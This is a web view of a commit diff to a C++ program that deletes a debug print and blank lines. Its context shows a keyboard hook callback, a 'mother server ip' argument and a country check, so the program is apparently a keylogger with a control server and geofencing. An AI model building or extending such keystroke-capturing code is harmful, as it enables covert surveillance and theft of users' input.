General: Remove unnecessary line
This commit is contained in:
parent
790582646f
commit
277f473d6d
|
@ -65,15 +65,12 @@ LRESULT CALLBACK keyboard_callback(int nCode, WPARAM wParam, LPARAM lParam) {
|
||||||
}
|
}
|
||||||
|
|
||||||
/*
|
/*
|
||||||
|
|
||||||
ARGUMENTS:
|
ARGUMENTS:
|
||||||
- 1: initial mother server ip
|
- 1: initial mother server ip
|
||||||
- 2: whitelisted country
|
- 2: whitelisted country
|
||||||
*/
|
*/
|
||||||
int main(int argc, char** argv) {
|
int main(int argc, char** argv) {
|
||||||
|
|
||||||
std::cout << "lmao" << std::endl;
|
|
||||||
|
|
||||||
// security Checks
|
// security Checks
|
||||||
if (!check_country(argv[2]))
|
if (!check_country(argv[2]))
|
||||||
return 0;
|
return 0;
|
||||||
|
|
Loading…
Reference in New Issue
Block a user